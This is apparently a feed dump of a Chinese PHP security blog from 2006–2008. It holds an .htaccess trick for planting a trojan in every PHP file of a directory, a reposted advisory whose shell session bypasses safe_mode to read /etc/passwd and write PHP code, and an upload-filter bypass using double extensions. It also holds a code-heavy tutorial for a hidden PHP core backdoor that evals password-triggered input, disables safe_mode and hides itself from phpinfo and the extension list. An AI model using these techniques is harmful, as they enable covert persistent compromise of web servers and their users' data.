PHP博客-GaRY's Blog-随笔分类-PHP securityhttp://www.phpweblog.net/GaRY/category/84.htmlBeginning is always beautifulzh-cnFri, 04 Jan 2008 16:16:33 GMTFri, 04 Jan 2008 16:16:33 GMT60.htaccess后门http://www.phpweblog.net/GaRY/archive/2007/12/25/htaccess_backdoor.htmlwofeiwowofeiwoTue, 25 Dec 2007 05:44:00 GMThttp://www.phpweblog.net/GaRY/archive/2007/12/25/htaccess_backdoor.htmlhttp://www.phpweblog.net/GaRY/comments/2595.htmlhttp://www.phpweblog.net/GaRY/archive/2007/12/25/htaccess_backdoor.html#Feedback1http://www.phpweblog.net/GaRY/comments/commentRss/2595.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/2595.html
PHP有个特性,会根据apache的httpd.conf和.htaccess来覆盖自己php.ini的设置.
恰好,找到两个邪恶的属性:

auto_prepend_file string

指定在主文件之前自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来,因此会使用 include_path

特殊值 none 禁止了自动前缀。

auto_append_file string

指定在主文件之后自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来,因此会使用 include_path

特殊值 none 禁止了自动后缀。

Note: 如果脚本通过 exit() 终止,则自动后缀不会发生。


于是很简单,利用.htaccess就能包含文件,并且不用修改任何对方的php文件,同目录下所有php文件就被植入木马了.管理员不注意的话可能就被忽略掉.
本地测试了一下,写了个.htaccess文件到我的sphpblog目录中.

.htaccess

然后随意访问一下sphpblog中的任意文件.

.haccess

当然直接包含.haccess文件太明显了,上面一对无关和出错信息会出卖你的后门的.我这里只是PoC,要包含什么就随便各位了.
哦,还有一点,会很方便:

include_path    ".;/path/to/php/pear"    PHP_INI_ALL    

什么意思我就不说了.各位自己琢磨吧,呵呵


wofeiwo 2007-12-25 13:44 发表评论
]]>[zt]PHP 5.2.4 mail.force_extra_parameters unsecurehttp://www.phpweblog.net/GaRY/archive/2007/11/26/2392.htmlwofeiwowofeiwoMon, 26 Nov 2007 04:03:00 GMThttp://www.phpweblog.net/GaRY/archive/2007/11/26/2392.htmlhttp://www.phpweblog.net/GaRY/comments/2392.htmlhttp://www.phpweblog.net/GaRY/archive/2007/11/26/2392.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/2392.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/2392.htmlps:通过mail.force_extra_parameters,还真像当年的mail函数bypass safemode漏洞.


  Topic : PHP 5.2.4 mail.force_extra_parameters unsecure
  SecurityAlert : 47
  CVE : CVE-2007-3378
  SecurityRisk : Medium  alert
  Remote Exploit : No
  Local Exploit : Yes
  Exploit Given : Yes
  Credit : Maksymilian Arciemowicz
  Date : 25.11.2007
  Affected Software : PHP <= 5.2.4

  Advisory Text :  

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.4 mail.force_extra_parameters unsecure ]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason
Date:
- - Written: 06.09.2007
- - Public: 0x.0x.2007

SecurityReason Research
SecurityAlert Id: 47

CVE: CVE-2007-3378
SecurityRisk: Medium

Affected Software: PHP <= 5.2.4
Advisory URL:
http://securityreason.com/achievement_securityalert/47
Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique
PHP-specific features thrown in. The goal of the language is to
allow web developers to write dynamically generated pages
quickly.
When using PHP as an Apache module, you can also change the
configuration settings using directives in Apache configuration
files (e.g. httpd.conf) and .htaccess files. You will need
"AllowOverride Options" or "AllowOverride
All" privileges to do so.

php_value name value

Sets the value of the specified directive. Can be used only with
PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a
previously set value use none as the value.
Note: Don't use php_value to set boolean values. php_flag (see
below) should be used instead.

php_flag name on|off

Used to set a boolean configuration directive. Can be used only
with PHP_INI_ALL and PHP_INI_PERDIR type directives.

mail.force_extra_parameters - Force the addition of the specified
parameters to be passed as extra parameters to the sendmail
binary. These parameters will always replace the value of the 5th
parameter to mail(), even in safe mode

http://pl.php.net/manual/en/configuration.changes.php

- --- 1. htaccess safemode and open_basedir Bypass Vulnerability
per mail.force_extra_parameters ---

We have recrived a lot of question about news
http://securityreason.com/news/0/0x1f . And we will show How to
exploit this issue. When using PHP as an Apache module, you can
also change the configuration settings using directives in
.htaccess file. But it is possible to bypass a safe_mode or
open_basedir per mail.force_extra_parameters. In a lot of servers
is sendmail, can be also exim etc. But we show how to exploit
this for a famous mail server (SENDMAIL).

For example you can set mail.force_extra_parameters via
.htaccess.

cxib# curl -I http://localhost:82
HTTP/1.1 200 OK
Date: Thu, 06 Sep 2007 22:18:35 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1
DAV/2 PHP/5.2.4
Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT
ETag: "27e4f0-2c-4c23b600"
Accept-Ranges: bytes
Content-Length: 44
Content-Type: text/html

Apache 2.2.4 and PHP 5.2.4. Let's see folder
"/narkotyk" in localhost:82.

cxib# ls -la
total 10
drwxrwxrwx 2 www www 512 Sep 7 00:26 .
drwxr-xr-x 4 www wheel 512 Sep 7 00:22 ..
- -rw-r--r-- 1 www www 106 Sep 7 00:25 .htaccess
- -rw-r--r-- 1 www www 29 Sep 7 00:25 file1.php
- -rw-r--r-- 1 www www 56 Sep 7 00:26 file2.php
cxib# cat file1.php
<? include("/etc/passwd"); ?>

cxib# curl http://localhost:82/narkotyk/file1.php
<br />
<b>Warning</b>: include() [<a
href='function.include'>function.include</a>]: SAFE MODE
Restriction in effect. The script whose uid is 80 is not allowed
to access /etc/passwd owned by uid 0 in
<b>/usr/local/www/apache22/data/narkotyk/file1.php</b>
; on line <b>1</b><br />
<br />
<b>Warning</b>: include(/etc/passwd) [<a
href='function.include'>function.include</a>]: failed to
open stream: Invalid argument in
<b>/usr/local/www/apache22/data/narkotyk/file1.php</b>
; on line <b>1</b><br />
<br />
<b>Warning</b>: include() [<a
href='function.include'>function.include</a>]: Failed
opening '/etc/passwd' for inclusion (include_path='.:') in
<b>/usr/local/www/apache22/data/narkotyk/file1.php</b>
; on line <b>1</b><br />

so safe_mode is open.
Let's see files .htaccess and file2.php

cxib# cat file2.php
<? var_dump(mail("root@localhost",
"hallo", "root")); ?>
cxib# cat .htaccess
php_value mail.force_extra_parameters '-C /etc/passwd -X
/usr/local/www/apache22/data/narkotyk/result.txt'

and let's send request to file2.php

cxib# curl http://localhost:82/narkotyk/file2.php
bool(false)

False!? No

cxib# ls -la /usr/local/www/apache22/data/narkotyk/result.txt
- -rw-r--r-- 1 www www 7130 Sep 7 00:31
/usr/local/www/apache22/data/narkotyk/result.txt
cxib#

result.txt has been created.

cxib# cat /usr/local/www/apache22/data/narkotyk/result.txt
69647 >>> /etc/passwd: line 3: unknown configuration
line "root:*:0:0:Charlie &:/root:/bin/csh"
69647 >>> /etc/passwd: line 4: unknown configuration
line "toor:*:0:0:Bourne-again Superuser:/root:"
..... etc.

We can read file and safe_mode and open_basedir is bypassed.

It is possible create file with php code. But we need have
sendmail.cf to send email.

Example:

cxib# cat .htaccess
php_value mail.force_extra_parameters '-C
/usr/local/www/apache22/data/narkotyk/sendmail.cf -X
/usr/local/www/apache22/data/narkotyk/phpcode.php'
cxib# cat file3.php
<? var_dump(mail("root@xxxxxxxxxxxxxxxxxx",
"h<? phpinfo(); ?>allo", "root"));
?>

We need create /usr/local/www/apache22/data/narkotyk/sendmail.cf
and configure this file. Then

cxib# curl http://localhost:82/narkotyk/file3.php
bool(true)
cxib#
cxib# cat phpcode.php
69755 <<< To: root@xxxxxxxxxxxxxxxxxx
69755 <<< Subject: h<? phpinfo(); ?>allo
69755 <<<
69755 <<< root
69755 <<< [EOF]
69757 === CONNECT securityreason.pl
... etc

and now

cxib# curl http://localhost:82/narkotyk/phpcode.php
69755 <<< To: root@xxxxxxxxxxxxxxxxxx
69755 <<< Subject: h<!DOCTYPE html PUBLIC
"-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html><head>
<style type="text/css">
body {background-color: #ffffff; color: #000000;}
body, td, th, h1, h2 {font-family: sans-serif;}
... phpinfo().

This was example for php 5.2.4 with sendmail. But we think, it is
possible exploit exim and more send mail programs. In PHP 5.2.4
mail.force_extra_parameters is filtered per
php_escape_shell_cmd(). But we needn't bypass this function.

- --- mail.c ---
if (force_extra_parameters) {
extra_cmd = php_escape_shell_cmd(force_extra_parameters);
} else if (extra_cmd) {
extra_cmd = php_escape_shell_cmd(extra_cmd);
}
- --- mail.c ---

Interesting is:

- --- mail.c ---
if (PG(safe_mode) && (ZEND_NUM_ARGS() == 5)) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "SAFE MODE
Restriction in effect. The fifth parameter is disabled in SAFE
MODE.");
RETURN_FALSE;
}
- --- mail.c ---

5 th parameter in mail() function is checked.
mail.force_extra_parameters no.

Before public advisory we tested issue and we send advisory to
PHP Team. Main problem is that, we do not recived any answer.
We do not checked patch to CVE-2007-3378 (SREASONRES:20070627),
but we are using CVE-2007-3378 to identification .

http://securityreason.com/achievement_securityalert/47

php_escape_shell_cmd() is not reason for CVE-2007-3378.

- --- 2. Exploit ---
SecurityReason will not public official exploit for this issue.

Anybody can self exploit this.

- --- 3. How to fix ---

- --- note from SREASONRES:20070627 ---
This bug has been founded on February 2007
We contacted with PHP Team again.
With co-operation Stanislav Malyshev from PHP Team the PHP 5.2.5
is now fully patched against
"mail.force_extra_parameters" issue .
- --- note from SREASONRES:20070627 ---

Update to PHP5.2.5

- --- 4. Greets ---

For: sp3x, Infospec, p_e_a, l5x and Stefan Esser

- --- 5. Contact ---

Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (FreeBSD)

iD8DBQFHSZ1w3Ke13X/fTO4RAnKnAJ0drPZhrdtiheaR9b8mLZ0IjyJoIQCfZC3A
jn8i1L2eCHVS1jBuN24ySc0=
=ZCW0
-----END PGP SIGNATURE-----


wofeiwo 2007-11-26 12:03 发表评论
]]>好久没更新http://www.phpweblog.net/GaRY/archive/2007/07/24/1559.htmlwofeiwowofeiwoTue, 24 Jul 2007 14:42:00 GMThttp://www.phpweblog.net/GaRY/archive/2007/07/24/1559.htmlhttp://www.phpweblog.net/GaRY/comments/1559.htmlhttp://www.phpweblog.net/GaRY/archive/2007/07/24/1559.html#Feedback3http://www.phpweblog.net/GaRY/comments/commentRss/1559.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/1559.htmlphp-5.2.3-localexploit-for-win
Tested on winxp sp2 cn
exploit

wofeiwo 2007-07-24 22:42 发表评论
]]>FleaPHP默认上传类的一个隐患http://www.phpweblog.net/GaRY/archive/2007/05/30/Something_About_FleaPHP_Upload_Class.htmlwofeiwowofeiwoWed, 30 May 2007 08:56:00 GMThttp://www.phpweblog.net/GaRY/archive/2007/05/30/Something_About_FleaPHP_Upload_Class.htmlhttp://www.phpweblog.net/GaRY/comments/1282.htmlhttp://www.phpweblog.net/GaRY/archive/2007/05/30/Something_About_FleaPHP_Upload_Class.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/1282.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/1282.html随着各种开发框架的盛行,程序员也不愿意做那么多重复的事情了,开发,速度最重要.现在开发什么东西都讲究一个效率.
目前国内似乎还没有多少人对框架的安全性有多少研究.毕竟如果一个底层的编程框架出了问题,很多程序都将受到威胁.
我下了个国内现在很流行的php框架中一个:FleaPHP 1.0.70 beta.翻了翻他的FLEA/FLEA/Helper/FileUploader.php,这个是此框架默认的文件上传类.它有一个检查上传文件是否合法的函数:

    function check($allowExts = null, $maxSize = null)
    {
        if (!$this->isSuccessed()) { return false; }
        //允许上传的扩展名
        if ($allowExts) {
            if (strpos($allowExts, ',')) {
                $exts = explode(',', $allowExts);
            } elseif (strpos($allowExts, '/')) {
                $exts = explode('/', $allowExts);
            } elseif (strpos($allowExts, '|')) {
                $exts = explode('|', $allowExts);
            } else {
                $exts = array($allowExts);
            }

            $fileExt = strtolower($this->getExt());//获取扩展名
            $passed = false;
            $exts = array_filter(array_map('trim', $exts), 'trim');
            foreach ($exts as $ext) {
                if (substr($ext, 0, 1== '.') {
                    $ext = substr($ext, 1);
                }
                if ($fileExt == strtolower($ext)) {
                    $passed = true;
                    break;
                }
            }
            if (!$passed) {
                return false;
            }
        }

        if ($maxSize && $this->getSize() > $maxSize) {
            return false;
        }

        return true;
    }

再看getExt函数:

    function getExt()
    {
        if ($this->isMoved()) {
            return pathinfo($this->getNewPath(), PATHINFO_EXTENSION);
        } else {
            return pathinfo($this->getFilename(), PATHINFO_EXTENSION);
        }
    }

继续跟踪php的pathinfo函数:

/* {{{ proto array pathinfo(string path[, int options])
   Returns information about a certain string */
PHP_FUNCTION(pathinfo)
{
    zval *tmp;
    char *path, *ret = NULL;
    int path_len, have_basename;
    size_t ret_len;
    long opt = PHP_PATHINFO_ALL;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l"&path, &path_len, &opt) == FAILURE) {
        return;
    }

    have_basename = ((opt & PHP_PATHINFO_BASENAME) == PHP_PATHINFO_BASENAME);
    
    MAKE_STD_ZVAL(tmp);
    array_init(tmp);
    
    ......
    ......

    if ((opt & PHP_PATHINFO_EXTENSION) == PHP_PATHINFO_EXTENSION) {
        char *p;
        int idx;

        if (!have_basename) {
            php_basename(path, path_len, NULL, 0&ret, &ret_len TSRMLS_CC);
        }

        p = zend_memrchr(ret, '.', ret_len);

        if (p) {
            idx = p - ret;
            add_assoc_stringl(tmp, "extension", ret + idx + 1, ret_len - idx - 11);
        }
    }
    
    ......
    ......

    zval_ptr_dtor(&tmp);
}
/* }}} */

到这里明白了,原来都只看文件名最后一个  "."  之后的部分作为文件的扩展名.那么如果根据apache的一个特性,我们可以使用多扩展名的方式上传php文件而绕过验证.(比如允许的扩展名里有rar,pdf等apache不认识但常见的类型,我们就可以上传shell.php.rar并得以执行)

当然这个只是个安全隐患而已.并不是所有用FleaPHP的程序都有这个问题.
就像superhei说的那样,关键在于看开发者如何去使用框架,不能太过依赖于框架提供的函数.而必须自己做些必要的前提验证.就能避免漏洞



wofeiwo 2007-05-30 16:56 发表评论
]]>Developing A PHP Core Backdoorhttp://www.phpweblog.net/GaRY/archive/2007/05/23/Developing_A_PHP_Core_Backdoor.htmlwofeiwowofeiwoWed, 23 May 2007 12:01:00 GMThttp://www.phpweblog.net/GaRY/archive/2007/05/23/Developing_A_PHP_Core_Backdoor.htmlhttp://www.phpweblog.net/GaRY/comments/1242.htmlhttp://www.phpweblog.net/GaRY/archive/2007/05/23/Developing_A_PHP_Core_Backdoor.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/1242.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/1242.htmlAuthor: wofeiwo/GaRY  <wofeiwo_at_gmail_dot_com>


目录

1)前言
2)优缺点
3)设计
4)功能实现
5)参考文档
6)一些说明


1)前言

PHP是一个非常流行的web server端的script语言.目前很多web应用程序都基于php语言实现.由于php是个开源软件并易于扩展,所以我们可以通过编写一个PHP模块(module 或者叫扩展 extension)来实现一个Backdoor.而且php支持使用dl函数动态加载模块的技术,这种类似linux等系统上的LKM机制让我们的Backdoor可以更轻松的加载.本文就简单介绍下修改PHP内核的Backdoor的实现.

2)优缺点

优点:

1. 众所周知,PHP是一个跨平台的脚本语言,所以php Backdoor也可以很方便得跨平台.当然这必须要求你尽量使用C库或者使用php内核中提供的API来编写代码.而尽量少用系统API.不过这总比ring0下的Backdoor什么都要自己实现要好.
2. 由于PHP与客户端的通讯是通过http协议实现的.所以也不用担心端口隐藏,进程隐藏等问题.
3. 加载方便.你可以通过设置php.ini或者使用dl函数来加载你的Backdoor.或者,如果你愿意的话你可以把Backdoor编译到php里去.
4. 配合webshell使用,用Backdoor配置php环境,让webshell突破disable fuction,safe_mode,open_basedir等限制.

缺点:

1. 权限低.Backdoor的权限完全取决于web server程序的权限.必须与其他工具配合使用以得到高权限.
2. 基于php,只是一个ring3下的Backdoor,所以不能太底层,很多功能都受到限制.

3)设计:

我们这里做为一个例子,设计了个简单的php Backdoor,它主要实现了几个功能:

1. 通过过滤用户提交的特定变量来启动Backdoor.
2. 修改php环境变量.为webshell提供宽松的执行环境.
3. 直接执行用户提交的php代码.
4. 隐藏自身.

4)功能实现

前置知识:
要编写php Backdoor,必须先了解php module的编写技术.这个内容超出本文的范围,读者可以看下本文最后列出的参考文档.并且最好先查看以下文件以熟悉php内核的API.

php-src/main/php.h, 位于PHP 主目录。这个文件包含了绝大部分 PHP 宏及 API 定义。
php-src/Zend/zend.h, 位于 Zend 主目录。这个文件包含了绝大部分 Zend 宏及 API 定义。
php-src/Zend/zend_API.h, 也位于 Zend 主目录,包含了Zend API 的定义。

以下的结构体,定义了一个PHP Backdoor模块的基本信息:

zend_module_entry wfw_module_entry = {
 STANDARD_MODULE_HEADER,
 "wfw",     //模块名
 wfw_functions,   //导出函数结构体
 PHP_MINIT(wfw),  //模块初始化
 PHP_MSHUTDOWN(wfw), //模块清理
 PHP_RINIT(wfw),  //运行时初始化
 PHP_RSHUTDOWN(wfw), //运行时清理
 PHP_MINFO(wfw),  //处理phpinfo中的模块信息
 "0.1",     //模块版本
 STANDARD_MODULE_PROPERTIES
};


在php生命周期中,ZendEngine首先要初始化module,每个module中定义的PHP_MINIT_FUNCTION函数作为初始化代码(ModuleInit)都会被执行一次,而PHP_RINIT_FUNCTION函数则是在每次页面被请求的时候(RuntimeInit)都会执行一次.因此对php函数的hook,设置php环境变量,对user input的过滤,都可以根据需要在这两个函数中进行.然后在PHP_MSHUTDOWN_FUNCTION和PHP_RSHUTDOWN_FUNCTION中进行相应的清理.而作为Backdoor,PHP_MINFO_FUNCTION函数对我们则没什么必要,可以把这里设置为NULL.

当然会了php api还不够,再配合各系统上提供的api,并通过宏定义区分以跨平台.一个backdoor是很容易编出来的.在本文中我不会直接说明每个功能的实现,这些在所有ring3后门中都大同小异.我只说明些在PHP core环境下需要注意的部分.
 
过滤变量:
要过滤web server传递过来的变量,这有两种办法,一种是通过修改SAPI的input_filter,或者是treat_data.你可以是hook后再执行php的原始代码,也可以直接替换原始函数:

 

//
//函数原型如下:
//unsigned int input_filter(int arg, char *var, char **val, unsigned int val_len, unsigned int *new_val_len TSRMLS_DC)
//arg可以是PARSE_POST,PARSE_GET,PARSE_COOKIE,PARSE_STRING,PARSE_ENV等值,表示此变量是通过什么方式传递进来的.
//var,val分别是变量名和变量值
//
SAPI_API SAPI_INPUT_FILTER_FUNC(wfw_input_filter)
{
 if(new_val_len) *new_val_len = val_len;
 
 ////////////////////////////////////////////////////////
 //以上是原php中处理的代码,下面则是我添加的.
 ////////////////////////////////////////////////////////
 if(strcmp(var,"pw"== 0 || strcmp(*val,"password"== 0)
  dosomething();
 ////////////////////////////////////////////////////////
 return SUCESS;
}

void wfw_hook_input_filter()
{
 sapi_register_input_filter(wfw_input_filter); //注册为input_filter
}

另外一种是直接从php内建的数组里获取变量:

int find_var()
{
 zval **array, **data;
 
 TSRMLS_FETCH();

 //查找_GET数组
 if(SUCCESS != zend_symtable_find(&EG(symbol_table), "_GET", strlen("_GET")+1, (void **)&array))
 {
  return FAILURE;
 }
 //查找pw变量 
 if(SUCCESS != zend_symtable_find(HASH_OF(*array), "pw", strlen("pw")+1, (void **)&data))
 {
  return FAILURE;
 }
// 比对pw变量值,是密码,则执行我们的代码.
 if(strcmp(Z_STRVAL_PP(data),"password"== 0)
  dosomething();
 return SUCCESS;
}

使用那一种方式就看你的要求了.第一种可以直接获得用户提交的原始数据,如果你要在这里做处理或者filter,可以使用这种方法,一般没有特殊要求,使用第二种方法就可以了.

设置环境:
只要修改每次RINIT时候的ini设置,就可以了,我们使用ZEND API: zend_alter_ini_entry就可以实现这个功能:

 

zend_alter_ini_entry("safe_mode", sizeof("safe_mode"), "0", sizeof("0"- 1, PHP_INI_SYSTEM, PHP_INI_STAGE_ACTIVATE);

执行用户提交的代码:
过滤web server传递过来的变量,并用以下函数执行即可:

int run_user_code(char *str)
{
 int result;
 zval retval_ptr;
 result = zend_eval_string(str, &retval_ptr, string_name TSRMLS_CC);
 convert_to_string(retval_ptr);
 php_printf("%s\r\n", Z_STRVAL(zval));
 return result;
}

Hook函数:
Hook函数有不同方式,根据需要Hook函数类型的不同而不同,比如我想要替换phpinfo这个php语言内建函数,只需要这么做:

//注册新函数结构体
zend_function_entry hooked_functions[] = {
 PHP_NAMED_FE(phpinfo, PHP_FN(hooked_phpinfo), NULL//注册为phpinfo的别名
 {NULL, NULL, NULL/* Must be the last line in wfw_functions[] */
};

void hook_fuctions(void)
{
 TSRMLS_FETCH();
 
 /* 替换函数 */
 zend_hash_del(CG(function_table), "phpinfo", sizeof("phpinfo")); //从completer global里删除phpinfo函数
 //注册新函数
#ifndef ZEND_ENGINE_2
 zend_register_functions(hooked_functions, NULL, MODULE_PERSISTENT TSRMLS_CC); 
#else
 zend_register_functions(NULL, hooked_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
#endif
}

//新函数
PHP_FUNCTION(hooked_phpinfo)
{
 ..
}
/* {{{ PHP_MINIT_FUNCTION
 */
PHP_MINIT_FUNCTION(wfwcbd)
{
 hook_fuctions();
 
 

 return SUCCESS;
}

但是如果想要替换的是php内核的底层api,恐怕就需要使用到其他ring3 hook技术了.inline hook等.但幸好backdoor加载进php内核后和其他api是在同一进程上下文中的,所以查找函数地址也就比较方便.相信也不难实现,但是本文写作过程中并没有测试,有意的朋友可以自己尝试下.

隐藏:
这里所谓的隐藏并不是隐藏我们的文件,而是让我们的Backdoor module在php中不可见.具体做法是让我们的module注册为zend extension,而在module_registry中删除自身.这样get_loaded_extensions也就找不到我们模块的信息了.zend_extension结构体定义如下:

 

struct _zend_extension {
 char *name;
 char *version;
 char *author;
 char *URL;
 char *copyright;

 startup_func_t startup;   //相当于MINIT
 shutdown_func_t shutdown;    //相当于MSHUTDOWN
 activate_func_t activate;  //相当于RINIT
 deactivate_func_t deactivate; //相当于RSHUTDOWN

 message_handler_func_t message_handler;

 op_array_handler_func_t op_array_handler;

 statement_handler_func_t statement_handler;
 fcall_begin_handler_func_t fcall_begin_handler;
 fcall_end_handler_func_t fcall_end_handler;

 op_array_ctor_func_t op_array_ctor;
 op_array_dtor_func_t op_array_dtor;

 int (*api_no_check)(int api_no);
 void *reserved2;
 void *reserved3;
 void *reserved4;
 void *reserved5;
 void *reserved6;
 void *reserved7;
 void *reserved8;

 DL_HANDLE handle;
 int resource_number;
};

实现代码如下:

 

#include "zend_extensions.h"

static zend_llist_position lp = NULL;
static void wfw_op_array_ctor(zend_op_array *op_array);
static void wfw_op_array_dtor(zend_op_array *op_array);
static int (*old_startup)(zend_extension *extension) = NULL;
static zend_extension *ze = NULL
static int wfw_module_startup(zend_extension *extension);
static void wfw_module_active(void);
static void wfw_module_deactive(void);
static void wfw_shutdown(zend_extension *extension);
static int wfw_startup_wrapper(zend_extension *ext);


static zend_extension wfw_zend_extension_entry = {
 "wfwcbd",
 "0.1",
 "wfw PHP Core BackDoor",
 "http://www.phpweblog.net/GaRY",
 "(C) Copyright 2007",
 
 wfw_module_startup,
 wfw_shutdown,
 wfw_module_active,
 wfw_module_deactive,
 NULL,
 NULL,
 NULL,
 NULL,
 NULL,
 wfw_op_array_ctor,
 wfw_op_array_dtor,
 
 STANDARD_ZEND_EXTENSION_PROPERTIES
};


/* {{{ wfw_functions[]
 *
 * Every user visible function must have an entry in wfw_functions[].
 */
zend_function_entry wfw_functions[] = {
 PHP_FE(your_ext_function,   NULL)
 ..
 ..
 {NULL, NULL, NULL/* Must be the last line in wfw_functions[] */
};
/* }}} */

zend_module_entry phper_module_entry = {
#if ZEND_MODULE_API_NO >= 20010901
 STANDARD_MODULE_HEADER,
#endif
 "phper",
 NULL,
 PHP_MINIT(phper),
 NULL, // PHP_MSHUTDOWN(phper),  //同时我们这里也就不需要以下函数了.全部替换为NULL,用zend extension里的同功能函数代替
 NULL, // PHP_RINIT(phper),  
 NULL, // PHP_RSHUTDOWN(phper), 
 NULL, // PHP_MINFO(phper),
#if ZEND_MODULE_API_NO >= 20010901
 "0.1", /* Replace with version number for your extension */
#endif
 STANDARD_MODULE_PROPERTIES
};

static void wfw_op_array_ctor(zend_op_array *op_array)
{
}

static void wfw_op_array_dtor(zend_op_array *op_array)
{
 if (wfw_zend_extension_entry.resource_number != -1) {
  op_array->reserved[wfw_zend_extension_entry.resource_number] = NULL;
 }
}

static int wfw_startup_wrapper(zend_extension *ext)
{
 int res;
 php_printf("php startup_wrapper\r\n");
 ze->startup = old_startup;
 res = old_startup(ext);
 wfw_module_startup(NULL);
 
 return res;
}

static int wfw_module_startup(zend_extension *extension)
{
 zend_module_entry *module_entry_ptr;
 int resid;
 TSRMLS_FETCH();
 
 php_printf("php_startup\r\n");
#ifndef ZEND_ENGINE_2
 zend_register_functions(wfw_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
#else
 zend_register_functions(NULL, wfw_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
#endif
 if (zend_hash_find(&module_registry, "wfwcbd", sizeof("wfwcbd"), (void **)&module_entry_ptr)==SUCCESS) {
  
  if (extension) {
  extension->handle = module_entry_ptr->handle;
  } else {
  zend_extension ext;
  ext = wfw_zend_extension_entry;
  ext.handle = module_entry_ptr->handle;
  zend_llist_add_element(&zend_extensions, &ext);
  extension = zend_llist_get_last(&zend_extensions);
  }
  module_entry_ptr->handle = NULL;
  //
  //删除module_registry中的信息
  //
  if(SUCCESS != zend_hash_del(&module_registry, "wfwcbd", sizeof("wfwcbd"))) return FAILURE;

 } else {
  return FAILURE;
 }

 resid = zend_get_resource_handle(extension);
 wfw_zend_extension_entry.resource_number = resid;

 return SUCCESS;


static void wfw_module_active()
{
 //php_printf("wfw active!\r\n");
 do_something_while_active();
}
static void wfw_module_deactive()
{
 //php_printf("wfw deactive!\r\n");
 do_something_while_deactive();
}
static void wfw_shutdown(zend_extension *extension)
{
 //php_printf("wfw shutdown\r\n");
 do_something_while_shutdown();
}

再配合hook phpinfo等函数,就可以让我们对php环境变量做的修改看不出来:

 

PHP_FUNCTION(hooked_phpinfo)

  int argc = ZEND_NUM_ARGS();
  long flag;
 
 //恢复设置
 zend_alter_ini_entry("safe_mode", sizeof("safe_mode"),
  old_safe_mode, sizeof(old_safe_mode) - 1, PHP_INI_SYSTEM, PHP_INI_STAGE_ACTIVATE);
    zend_alter_ini_entry("open_basedir", sizeof("open_basedir"),
  old_open_basedir, sizeof(old_open_basedir) - 1, PHP_INI_SYSTEM, PHP_INI_STAGE_ACTIVATE);
 
 
 
 if (zend_parse_parameters(argc TSRMLS_CC, "|l", &flag) == FAILURE) {
  return;
 }
 
 if(!argc) {
  flag = PHP_INFO_ALL;
 }
 
 php_start_ob_buffer(NULL, 4096, 0 TSRMLS_CC);
 php_print_info(flag TSRMLS_CC);
 php_end_ob_buffer(1, 0 TSRMLS_CC);
 
 //重新设置环境
 zend_alter_ini_entry("safe_mode", sizeof("safe_mode"),
  "0", sizeof("0"- 1, PHP_INI_SYSTEM, PHP_INI_STAGE_ACTIVATE);
 zend_alter_ini_entry("open_basedir", sizeof("open_basedir"),
  "", sizeof(""- 1, PHP_INI_SYSTEM, PHP_INI_STAGE_ACTIVATE);
 ..
 ..
 
 RETURN_TRUE;
}

使用以上所述的方法,基本一个简单的PHP core backdoor就可以实现了.当然,我们其实还可以加入些其他功能.比如通过控制http头提供个可交互shell,比如内嵌一个php webshell在module中,触发后用php_start_ob_buffer函数及php_end_ob_buffer控制输出,替代任何一个php文件的输出为我们的webshell....
开阔你的大脑吧.一切都由你的想像力来完成:)

5)一些说明

很久没有写文档了,文章比较乱.请各位包涵吧.我的语文水平也就那么点了:)
由于对于php core的研究我也是新手,以上文章难免失误,请各位指正,我的email: wofeiwo_at_gmail_dot_com
最后感谢下Ben.yan在本文写作过程中对我的极大帮助.没有他本文是完不成的

6)参考文档

PHP手册: http://www.php.net/manual/en/
PHP源代码: http://www.php.net/
suhosin源代码: http://www.suhosin.org/
php win32执行程序module: http://www.phpweblog.net/GaRY/archive/2007/05/15/php_win32_create_process_module.html



wofeiwo 2007-05-23 20:01 发表评论
]]>The Month of PHP Bugshttp://www.phpweblog.net/GaRY/archive/2007/03/08/962.htmlwofeiwowofeiwoThu, 08 Mar 2007 08:50:00 GMThttp://www.phpweblog.net/GaRY/archive/2007/03/08/962.htmlhttp://www.phpweblog.net/GaRY/comments/962.htmlhttp://www.phpweblog.net/GaRY/archive/2007/03/08/962.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/962.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/962.html
http://www.php-security.org/

wofeiwo 2007-03-08 16:50 发表评论
]]>PHP 5.2.0 session.save_path safe_mode and open_basedir bypasshttp://www.phpweblog.net/GaRY/archive/2006/12/09/PHP_5_0_2_session_save_path.htmlwofeiwowofeiwoSat, 09 Dec 2006 04:10:00 GMThttp://www.phpweblog.net/GaRY/archive/2006/12/09/PHP_5_0_2_session_save_path.htmlhttp://www.phpweblog.net/GaRY/comments/552.htmlhttp://www.phpweblog.net/GaRY/archive/2006/12/09/PHP_5_0_2_session_save_path.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/552.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/552.html

这个漏洞让我想起来以前发现的一个php的小问题。想想用在这里倒是很适用:

